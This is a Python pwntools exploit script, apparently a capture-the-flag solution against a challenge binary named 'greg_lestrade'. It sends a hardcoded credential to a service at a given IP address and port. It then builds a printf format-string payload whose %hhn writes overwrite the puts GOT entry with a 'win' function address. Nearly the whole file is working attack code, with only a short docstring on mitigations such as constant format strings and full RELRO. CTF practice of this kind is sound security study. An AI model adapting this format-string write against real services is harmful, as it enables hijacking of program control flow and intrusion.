```python
from pwn import *
from sys import argv
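# pwntools global settings: 64-bit Linux target, info-level logging.
context(os='linux', arch='amd64', log_level='info')

# Pick the tube `r` that main() talks to, based on the first CLI argument:
#   r... -> the remote challenge service
#   l... -> a service on localhost:6000
#   (no argument) -> spawn the ./greg_lestrade binary directly
# NOTE(review): the page lost its indentation; this assumes the final `else`
# pairs with the outer `len(argv) > 1` check, so that running without
# arguments starts the local process.
if len(argv) > 1:
    mode = argv[1]
    # startswith() also copes with an empty argument, where argv[1][0]
    # would raise IndexError.
    if mode.startswith('r'):
        r = remote('146.185.132.36', '12431')
    elif mode.startswith('l'):
        r = remote('localhost', 6000)
    else:
        # An unrecognised argument used to leave `r` undefined and only
        # surfaced later as a NameError inside main(); fail here instead.
        raise SystemExit("usage: {} [r|l]".format(argv[0]))
else:
    r = process('./greg_lestrade')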
def fsa64(offset, over_write_addr):
    """Build the conversion-specifier part of a printf-style format string.

    ``over_write_addr`` is packed with ``p64`` into eight bytes, and one
    ``%<width>c%<index>$hhn`` pair is emitted per byte.  The positional
    index starts at ``offset`` and increases by one for each pair.

    ``%hhn`` stores the number of characters printed so far as a single
    byte, so each width is chosen to move that running count (modulo 256)
    from the previous byte value to the next one.  Adding 0x100 keeps every
    width positive without changing the count modulo 256.

    The first width is computed as if the count were 0 modulo 256 when this
    fragment starts; main() arranges that with a 256-byte prefix.

    Returns the concatenated specifiers as ``bytes``.
    """
    value_bytes = list(p64(over_write_addr))
    pieces = []
    previous = 0  # running output count modulo 256 before the next pair
    for index, byte in enumerate(value_bytes, start=offset):
        width = byte + (0x100 - previous)
        pieces.append("%{}c%{}$hhn".format(width, index).encode())
        previous = byte
    return b"".join(pieces)
def main():
    """Authenticate, choose the admin action, then send the crafted command.

    The command is laid out as: 256 filler bytes, the ``%hhn`` specifiers
    from fsa64(), padding up to 400 bytes, then eight consecutive addresses
    ``puts_got`` .. ``puts_got + 7`` (one per byte written).

    NOTE(review): the names suggest the write redirects the ``puts`` GOT
    entry to a "win" function -- confirm against the binary.  For the
    defending side, this presumably depends on the service passing the
    command to a printf-family call as the format argument; a constant
    format string (``printf("%s", buf)``) removes the write primitive, and
    full RELRO makes the GOT read-only.
    """
    puts_got = 0x0602020
    win_fun = 0x40087a
    passwd = "7h15_15_v3ry_53cr37_1_7h1nk"

    # fmtarg = 58
    # The 256-byte prefix leaves the printed-character count at 0 modulo 256,
    # which is what fsa64() assumes for its first width.
    head = b"a" * 256 + fsa64(58, win_fun)
    # Pad to a fixed 400 bytes so the address table always starts at the
    # same offset within the command.
    filler = b"x" * (400 - len(head))
    targets = b"".join(p64(puts_got + i) for i in range(8))
    payload = head + filler + targets

    r.sendlineafter('Credential :', passwd)
    r.sendlineafter('1) admin action', "1")
    r.sendlineafter('command :', payload)
    print(r.recvall())
# Run the interaction only when executed as a script, not when imported.
if __name__ == "__main__":
    main()
```